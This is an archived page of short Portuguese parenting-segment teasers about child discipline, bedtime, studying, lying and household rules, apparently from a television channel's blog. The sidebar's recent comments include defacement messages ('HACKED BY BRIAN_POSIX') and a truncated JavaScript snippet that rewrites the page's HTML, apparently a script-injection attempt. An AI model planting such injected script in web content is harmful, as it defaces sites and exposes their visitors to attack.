Regras de Palmo e Meio @ 19:02

Seg, 11/07/11

Na rubrica desta semana vamos falar das “Regras de ouro sobre a disciplina”. Há formas mais correctas do que outras e formas incorrectas de educar os nossos filhos;

 

A disciplina consiste em 90% de prevenção e 10% de punição; A verdadeira disciplina começa aos 2 anos e estende-se até à idade adulta. Ninguém nasce ensinado. A criança precisa de aprender a comportar-se e os pais precisam de aprender a educar. Conhecermos as nossas limitações pode ajudar-nos a educar os nossos filhos. Sejamos realistas: por vezes temos de frustrar os nossos filhos. Fique a saber mais sobre estas e outras regras na rubrica desta terça-feira.

 


Tags:


Regras de Palmo e Meio @ 19:02

Seg, 06/06/11

Muitas crianças resistem até à exaustão (dos pais) na hora de ir para a cama. Parece ser um dos momentos predilectos para testar as regras e os limites, ao fim do dia, quando todos estamos mais cansados. E muitas vezes, aquilo que deveria ser um fim de dia tranquilo e feliz, acaba por transformar-se numa guerra com choro, gritos e até alguma palmada. Como resultado, as crianças ficam na cama a chorar por não quererem estar ali e os pais na sala, frustrados por não terem sabido lidar com a situação.

 


Tags:


Regras de Palmo e Meio @ 19:02

Seg, 09/05/11

Todos sabemos que o estudo é fundamental para os nossos filhos. Mas muitas vezes a ideia que lhes transmitimos, mesmo sem querer, é a de que estudar é aborrecido e cansativo, um mal necessário pelo qual também já passámos.

 

O nosso papel como pais deve ser o de motivar a criança para o estudo e dar deste uma imagem positiva, como contributo essencial para o seu desenvolvimento e crescimento pessoal e o caminho necessário para a sua independência financeira. Este último argumento convence muitas crianças e adolescentes.

 


Tags:


Regras de Palmo e Meio @ 19:02

Seg, 11/04/11

Apesar de não existirem muitas verdades absolutas em relação à disciplina, alguns princípios são tidos como universais, principalmente os que dizem respeito ao que nós, pais, não podemos ou devemos fazer na tentativa de educar os nossos filhos. Estão nesta lista bater por sistema, humilhar a criança, privar de alimentos essenciais, privar de afecto ou ameaçar com o abandono por parte dos pais.

 


Tags:


Regras de Palmo e Meio @ 19:00

Seg, 14/03/11

Todos sabemos que educar uma criança não é tarefa fácil. Mas a verdade é que a disciplina, bem aplicada é um instrumento fundamental para ajudar a criança e a ser feliz na idade adulta. É também verdade que ninguém nasce a saber como educar outro ser humano. Os pais precisam de ajuda e de orientações, até porque as crianças são diferentes: têm personalidades, comportamentos e reacções distintas.
Apesar de não haver uma formula mágica da disciplina, existem regras e conselhos que podem evitar o desgaste diário da relação entre pais e filhos e ajudar a controlar as birras, acabar com os gritos, com as discussões infinitas, com a resistência em comer ou dormir, entre outros problemas comuns à maioria dos pais.
No livro "Não te Volto a Dizer!" Paulo Oom explica como é que esta difícil tarefa de educar e disciplinar pode tornar-se mais fácil e, acima de tudo, mais eficaz. Repleto de casos reais e com um cariz muito prático, este livro vai tornar-se no melhor amigo de cada pai. Fique a saber tudo sobre este “manual” para os pais na rubrica desta semana.


Tags:


Regras de Palmo e Meio @ 19:00

Seg, 07/03/11

Mentir é natural e, até certo ponto, cerca dos cinco anos, é até saudável.

O que nos deve preocupar é a criança que nunca mente ou a que mente por sistema. Os pais são o modelo de virtudes preferencial para os seus

Filhos e a criança deve ser elogiada quando diz a verdade. Nas crianças com mais de cinco anos a mentira não deve passar despercebida e não pode ser tolerada. Uma reprimenda, colocar de castigo ou retirar algum privilégio, são formas de mostrarmos o nosso descontentamento por essa atitude.


Tags:


Regras de Palmo e Meio @ 19:00

Seg, 07/02/11

Esta terça-feira falamos sobre “fazer batota”. Fazer batota é inevitável. A criança deve ser ensinada a respeitar os outros e elogiada quando as suas atitudes são correctas para estimular a sua auto-confiança. Como interpretar a batota consoante as idades? O que os pais devem fazer se a criança faz batota? É importante que a criança peça desculpa quando faz batota. Conheça a resposta a estas e outras questões na próxima Rubrica Regras de Palmo e Meio.


Tags:


Regras de Palmo e Meio @ 17:30

Seg, 03/01/11

Mentir é natural e, até certo ponto, mais precisamente até aos  dos cinco anos, é saudável. O que nos deve preocupar é a criança que nunca mente ou a que mente por sistema. Os pais são o modelo de virtudes preferencial para os seus filhos e a criança deve ser elogiada quando diz a verdade. Nas crianças com mais de cinco anos a mentira não deve passar despercebida e não pode ser tolerada. Uma reprimenda, colocar de castigo ou retirar algum privilégio, são formas de mostrarmos o nosso descontentamento por essa atitude.


Tags:


Regras de Palmo e Meio @ 19:01

Seg, 08/11/10

Todas as crianças, em determinadas alturas da sua vida, precisam que se lhes diga o que devem fazer ou o que se espera delas. Mas saber dar ordens ou instruções é uma arte e algumas dicas podem evitar muitos problemas.

Como tema de actualidade abordaremos ainda a vacina contra o Rotavírus (contra a gastroenterite viral).




Regras de Palmo e Meio @ 19:44

Seg, 11/10/10

Todas as casas precisam de regras. É irreal pensarmos que podemos sobreviver sem elas. Podem ser poucas, podem ser simples, mas precisam de existir. Caso contrário a anarquia instala-se mais depressa do que possamos imaginar, principalmente se tivermos vários filhos. Esta terça-feira falamos de “Como estabelecer regras” na rubrica “Regras de Palmo e Meio”.



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO